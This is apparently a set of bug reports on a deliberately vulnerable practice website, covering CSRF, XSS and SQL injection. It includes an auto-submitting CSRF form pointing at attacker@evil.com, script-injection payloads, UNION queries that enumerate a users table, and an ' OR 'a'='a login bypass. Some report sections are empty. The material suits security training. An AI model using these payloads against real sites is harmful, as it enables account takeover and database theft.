Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /userinfo.php
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the profile update functionality. The application lacks anti-CSRF tokens and fails to verify request origins, allowing attackers to forge unauthorized requests on behalf of authenticated users.
<html> <body> <form action="http://testphp.vulnweb.com/userinfo.php" method="POST"> <input type="hidden" name="urname" value="Hacked by Asher "> <input type="hidden" name="ucc" value="1234-5678-0000-0000"> <input type="hidden" name="uemail" value="attacker@evil.com"> <input type="hidden" name="uphone" value="0000000000"> <input type="hidden" name="uaddress" value="CSRF Street 1337"> <input type="hidden" name="update" value="update"> <input type="submit" value="Submit CSRF"> </form> <script> document.forms[0].submit(); </script> </body> </html>
An attacker can:
OWASP Risk: Medium
CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /search.php
The application is vulnerable to both Reflected and Stored Cross-Site Scripting (XSS) attacks. User input is rendered in the HTML output without proper encoding or sanitization, allowing attackers to inject malicious JavaScript.
alert("Reflected XSS")
Tested URL: https://testphp.vulnweb.com/search.php?test=alert("Reflected XSS")
<script>alert("Stored XSS")</script>
Test Steps:
An attacker can execute arbitrary JavaScript in the victimβs browser context. This can lead to:
OWASP Risk: High
CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation (βCross-site Scriptingβ)
Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /artists.php?artist=
The application is vulnerable to SQL Injection via the artist parameter. Unsanitized input is directly passed to SQL queries, allowing an attacker to manipulate queries and extract sensitive database information.
Payload:
' OR 1=1 --
Error-based payload:
1'
Order by testing:
?artist=1 ORDER BY 1 -- β
?artist=1 ORDER BY 4 -- β (error)
?artist=-1 UNION SELECT 1,2,database() -- β acuart
?artist=-1 UNION SELECT 1,2,table_name FROM information_schema.tables WHERE table_schema='acuart' LIMIT 7,1 -- β users
?artist=-1 UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 -- β uname
?artist=-1 UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1,1 -- β pass
An attacker can enumerate tables, extract usernames, passwords, credit card details (cc), and other sensitive data. This can lead to full database compromise.
OWASP Risk: High
CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command
π§ Vulnerability Type:
SQL Injection β Authentication Bypass
π₯οΈ Affected URL:
http://testphp.vulnweb.com/login.php
π§ͺ Parameters Tested:
𧨠Payload Used:
Username: admin
Password:
' OR 'a'='a
π₯ Impact:
This payload bypasses the login mechanism by injecting a malicious SQL condition that always evaluates to true ('a'='a'). It results in unauthorized access to user accounts without knowing valid credentials.
βοΈ Technical Explanation:
Original query:
SELECT * FROM users WHERE username = '$username' AND password = '$password';
Injected query:
SELECT * FROM users WHERE username = 'admin' AND password = '' OR 'a'='a';
Effective query:
SELECT * FROM users WHERE (username = 'admin' AND password = '') OR 'a'='a';
β Proof of Concept:
β οΈ Risk Level:
High β Allows complete authentication bypass and unauthorized admin access.
π‘οΈ Recommendation:
π§Ύ Reported By:
Asher aka bugshunter
Cybersecurity Researcher & Ethical Hacker